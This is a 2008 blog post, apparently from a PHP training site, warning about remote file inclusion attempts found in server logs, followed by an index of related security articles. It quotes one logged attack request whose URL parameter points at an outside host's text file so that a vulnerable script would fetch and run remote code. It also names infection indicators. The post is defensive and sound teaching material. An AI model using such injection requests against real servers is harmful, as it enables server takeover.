"Please help me debug this virus." I'm paraphrasing something that was posted, a long while ago now, on a board I look after ... and I deleted the code pretty darned fast, as I didn't (and still don't) want to form a source of information for the less scrupulous.
I was looking at a few issues on one of our servers earlier today, and found myself looking through page after page of attempted injection attacks, where a rogue visitor to the web site (almost inevitable an automated program) supplies a parameter that's the URL from another site, in the hope that my PHP script will read that other page and run the code therein on my server ... here's an example of the sort of thing (and this one's quite well known, and I have obfuscated it anyway, so I am giving few secrets away)
/phphtml.php?htmlclass_path=http://titureddo.changeview.org/vacanze/vini.txt?
Now ... this issue turned out to be a side shoot of what I was hunting down, but it acts as a timely reminder to be very careful indeed about using PHP's
require,
include,
passthru,
exec,
system (and that may not be an exhaustive list either) on anything that could remotely be a variable derived from a user input via
$_REQUEST and friends.
What's the risk? It's an injection attack (yes, I have the code. No - I am not reproducing it here!) and if it succeeds in finding a hole in your system, chances are (and experiences I have heard of confirm) that it will install itself on your server which will then form a part of the breeding colony ...
How many hack attempts like this are we getting? I estimate it's now thousands per day.
How do I know if I'm infected Well ... if you search your web pages for kangkung or RoxTeam and find something that you didn't know was there ...
Please note that this is just an example of one form of injection attack - this article is not intended to provide a complete of definitive list in any shape or form! (written 2008-08-31, updated 2008-09-04)
Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
H117 - Security in PHP [345] Spotting a denial of service attack - (2005-06-12)
[426] Robust checking of data entered by users - (2005-08-27)
[920] A lion in a cage - PHP - (2006-11-10)
[947] What is an SQL injection attack? - (2006-11-27)
[1052] Learning to write secure, maintainable PHP - (2007-01-25)
[1086] Injection attacks - safeguard your PHP scripts - (2007-02-20)
[1323] Easy handling of errors in PHP - (2007-08-27)
[1387] Error logging to file not browser in PHP - (2007-10-11)
[1396] Using PHP to upload images / Store on MySQL database - security questions - (2007-10-19)
[1482] A story about benchmarking PHP - (2007-12-23)
[1542] Are nasty programs looking for security holes on your server? - (2008-02-17)
[1679] PHP - Sanitised application principles for security and useability - (2008-06-16)
[1694] Defensive coding techniques in PHP? - (2008-07-02)
[1747] Who is watching you? - (2008-08-10)
[2025] Injection Attack if register_globals in on - PHP - (2009-02-04)
[2628] An example of an injection attack using Javascript - (2010-02-08)
[2688] Security considerations in programming - what do we teach? - (2010-03-22)
[2939] Protecting your images from use out of context - (2010-08-29)
[3210] Catchable fatal error in PHP ... How to catch, and alternative solutions such as JSON - (2011-03-22)
[3698] How to stop forms on other sites submitting to your scripts - (2012-04-15)
[3747] An easy way to comply with the new cookie law if your site is well designed - (2012-06-02)
[3813] Injection Attacks - PHP, SQL, HTML, Javascript - and how to neutralise them - (2012-07-22)
[4642] A small teaching program - demonstration of principles only - (2016-02-08)
Some other Articles
Think before you sendCalling procs in Tcl and how it compares to PerlReceptionServer overloading - turns out to be feof in PHPInjection Attacks - avoiding them in your PHPPointing all the web pages in a directory at a databaseThe Rise and Rise of First Bus FaresDoes fruit and veg drag on?EasterholicWhat is my real and my effective ID? [Linux]